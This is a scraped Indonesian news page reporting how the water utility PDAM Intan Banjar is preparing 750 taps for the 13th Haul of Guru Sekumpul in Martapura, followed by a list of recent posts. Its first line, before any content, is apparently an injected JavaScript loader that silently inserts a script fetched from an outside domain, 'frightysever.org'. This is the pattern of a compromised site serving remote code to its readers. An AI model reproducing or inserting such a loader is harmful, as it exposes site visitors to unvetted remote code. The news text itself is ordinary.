(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Ragam

Jelang Haul ke-13 Guru Sekumpul, PDAM Intan Banjar Siapkan 750 Kran Air


MARTAPURA, Berbagai persiapan jelang Haul ke-13 Al Allimul Allamah Al’arif Billah KH Muhammad Zaini bin Abdul Ghani atau Guru Sekumpul pada 23-25 Maret mendatang, terus dibenahi.

Salah satu diantaranya peran vital PDAM Intan Banjar menyuplai air bersih ke kawasan Sekumpul dan sekitarnya bagi kenyamaan jamaah yang akan datang dari berbagai daerah di Kalsel maupun luar Kalsel. Ini mengingat volume pemakaian air bersih PDAM Intan Banjar sangat tinggi dan tidak sedikit air yang bakal digunakan dalam haul tersebut.

Disambangi Kanal Kalimantan saat acara rapat persiapan Haul ke-13 di Mahligai Sultan Adam Martapura, Selasa (27/2), Kepala Bagian Transmisi dan Distribusi PDAM Intan Banjar Aliansyah SE mengatakan sampai saat ini PDAM Intan Banjar siap menyuplai air untuk seluruhan kebutuhan jamaah. Pihak penyedia air bersih milik pemerintah daerah itu akan menyuplai air langsung ke titik-titik kegiatan seperti dapur umum dan tempat wudhu para jamaah saat acara berlangsung.

“Kami siapkan ada sekitar 50 titik sumber air, di satu titik itu nantinya akan ada 15 kran yang dapat digunakan untuk kebutuhan para jamaah, jadi total ada 750 kran air yang tersedia untuk kebutuhan seperti dapur umum dan tempat wudhu,” ungkap Aliansyah.

Persiapan fasilitas kran wudhu oleh PDAM Intan Banjar akan disediakan 3 hari sebelum hari H, dan untuk dapur umum sendiri penyaluran air akan dilakukan sekitar 5 hari sebelum acara puncak.

Aliansyah menjelaskan berdasarkan pengalaman tahun sebelumnya, tahun ini PDAM Intan Banjar akan menyalurkan sekitar 50 kubik air untuk setiap dapur umum. PDAM intan Banjar juga akan terus memaksimalkan suplai untuk kebutuhan air yang akan digunakan.

Jika tahun lalu pihaknya mengakui untuk penyaluran air banyak pelanggan yang terganggu dan mengeluh akibat penyaluran hanya terfokus pada acara haul. Maka tahun ini diupayakan hal serupa tidak akan terjadi lagi karena PDAM Intan Banjar sudah mengantisipasi.

“Tahun ini kita akan menyediakan jaringan yang langsung terkoneksi ke Sungai Ulin, sehingga tidak mengganggu suplai jaringan pipa air yang lain, seperti jaringan yang berada di perkotaan,” pungkas Aliansyah. (rendy)

Reporter : Rendy
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Bupati Kapuas Resmikan Kantor Kelurahan Selat Hulu

KANALKALIMANTAN.COM, KUALA KAPUAS - Kantor Kelurahan Selat Hulu yang berlokasi di Jalan Cilik Riwut Gang… Read More

3 jam ago

13 Februari Hari Persatuan Ahli Farmasi Indonesia: Ini Sejarahnya

KANALKALIMANTAN.COM - Insan farmasi di Indonesia setiap tanggal 13 Februari memperingati Hari Persatuan Ahli Farmasi… Read More

5 jam ago

BI Kalsel Selenggarakan SERAMBI 2026, Dukung Kebutuhan Uang Kartal Periode Ramadan dan Idulfitri

KANALKALIMANTAN.COM, BANJARMASIN – Kantor Perwakilan (KPw) Bank Indonesia (BI) Provinsi Kalimantan Selatan menggelar kick off… Read More

6 jam ago

KPK Dalami Hubungan Jabatan Kepala KPP Madya Banjarmasin di 12 Perusahaan

KANALKALIMANTAN.COM, JAKARTA - Komisi Pemberantasan Korupsi (KPK) sedang mendalami hubungan antara jabatan direksi yang dimiliki… Read More

15 jam ago

Gubernur Muhidin Ingatkan Dana Transfer Pusat Dimanfaatkan Optimal

KANALKALIMANTAN.COM, BANJARMASIN – Gubernur Kalimantan Selatan (Kalsel) H Muhidin meminta langkah strategis untuk memastikan dana… Read More

15 jam ago

Upaya Mencegah Perkawinan Usia Anak di Balangan

KANALKALIMANTAN.COM, PARINGIN - Upaya mencegah perkawinan usia anak, Dinas Pemberdayaan Perempuan, Perlindungan Anak, Pengendalian Penduduk,… Read More

17 jam ago

This website uses cookies.